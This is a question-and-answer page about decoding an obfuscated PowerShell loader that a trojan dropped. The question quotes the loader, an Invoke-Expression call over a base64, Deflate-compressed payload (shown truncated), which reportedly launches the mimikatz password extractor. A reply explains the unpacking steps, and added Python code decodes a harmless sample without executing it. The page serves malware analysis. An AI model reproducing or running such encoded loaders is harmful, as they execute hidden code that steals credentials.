
I found a PowerShell script dropped by a trojan. I am not familiar with PowerShell, so I am just curious to see what it looks like inside, but the script is encoded and I am not able to decode it by basic means of base64 decoding.

I have tried these solutions:

Decoding base64 with PowerShell.

https://www.base64decode.org/

and a base64decoder application from a developer with an encoded.dec file, but that fails as well, saying that something is not a base64 character.

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/

...499 word pages later ...

V6CuHdj+nTu/cfL/AA==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

I am not sure what the output should be, as I am not experienced with PowerShell scripts. I have run the script on a sandbox website by the name of app.any.run and it opens "mimikatz" password extractor.

Asked by KwZc
  • The code base64-decodes the data string, converts it to a memory stream, uncompresses it, reads the resulting uncompressed stream, and executes the resulting text. That's a common pattern with PowerShell malware. You can do the decoding by doing individual steps in this matrjoshkommand from the inside out and assigning the result of each step to a variable: `$s = '7b0H...'; $b64 = [Convert]::FromBase64String($s); ...` – Ansgar Wiechers May 13 '19 at 22:14
  • Thank you, will have a go at this later today. – KwZc May 21 '19 at 07:40
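The decoding chain the comment describes (base64 decode, raw Deflate decompress, read as ASCII) can be reproduced without ever reaching the `Invoke-Expression` step, which is the safe way to look inside a dropped script. The following is an added example, not code from the question or the comment: it builds a constructed sample payload the same way the loader packs its data, pulls the base64 literal out of a loader one-liner, and unpacks it to text. The loader string, the sample plaintext and the helper names are assumptions for the demonstration; the only page-specific facts it relies on are the `FromBase64String` / `DeflateStream` / ASCII chain visible in the question.

```python
import base64
import zlib

# Constructed sample: a harmless PowerShell line, raw-deflated and base64-encoded
# the same way the dropped script packs its payload (Deflate, no zlib/gzip header).
SAMPLE_PLAINTEXT = 'Write-Host "hello from the decoded script"'


def pack_payload(text: str) -> str:
    """Build a base64(deflate(text)) string; used only to produce sample input."""
    compressor = zlib.compressobj(level=9, wbits=-15)  # wbits=-15 -> raw Deflate
    raw = compressor.compress(text.encode("ascii")) + compressor.flush()
    return base64.b64encode(raw).decode("ascii")


def unpack_payload(b64: str) -> str:
    """Reverse the loader's chain without executing anything:
    FromBase64String -> DeflateStream(Decompress) -> ASCII ReadToEnd."""
    # Drop whitespace that copy/paste or line wrapping may have introduced;
    # stray characters are what make online decoders report
    # "not a base64 character".
    cleaned = "".join(b64.split())
    raw = base64.b64decode(cleaned, validate=True)
    # .NET's DeflateStream is raw Deflate (RFC 1951): a negative wbits tells
    # zlib not to expect a zlib header. A plain zlib.decompress(raw) would fail
    # on this data, which is why generic "base64 decode" tools show garbage.
    plain = zlib.decompress(raw, wbits=-15)
    return plain.decode("ascii")


def extract_b64_literal(loader_line: str) -> str:
    """Pull the base64 argument out of a FromBase64String('...') call."""
    marker = "FromBase64String('"
    start = loader_line.index(marker) + len(marker)
    end = loader_line.index("'", start)
    return loader_line[start:end]


if __name__ == "__main__":
    # Assumed loader line, shaped like the one in the question but carrying
    # the constructed sample instead of the real payload.
    sample_b64 = pack_payload(SAMPLE_PLAINTEXT)
    loader = ("Invoke-Expression $(New-Object IO.StreamReader ($(New-Object "
              "IO.Compression.DeflateStream ($(New-Object IO.MemoryStream "
              f"(,$([Convert]::FromBase64String('{sample_b64}')))), "
              "[IO.Compression.CompressionMode]::Decompress)), "
              "[Text.Encoding]::ASCII)).ReadToEnd();")
    # Print the recovered script instead of running it.
    print(unpack_payload(extract_b64_literal(loader)))
```

To apply this to the real file, paste the full base64 literal (the part between the quotes in `FromBase64String('...')`) into `unpack_payload` and write the result to a file for reading; the same thing can be done in PowerShell by keeping the inner `New-Object` chain from the question and replacing the outer `Invoke-Expression` with `Set-Content` or `Write-Output`, so the decoded text is shown rather than executed.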
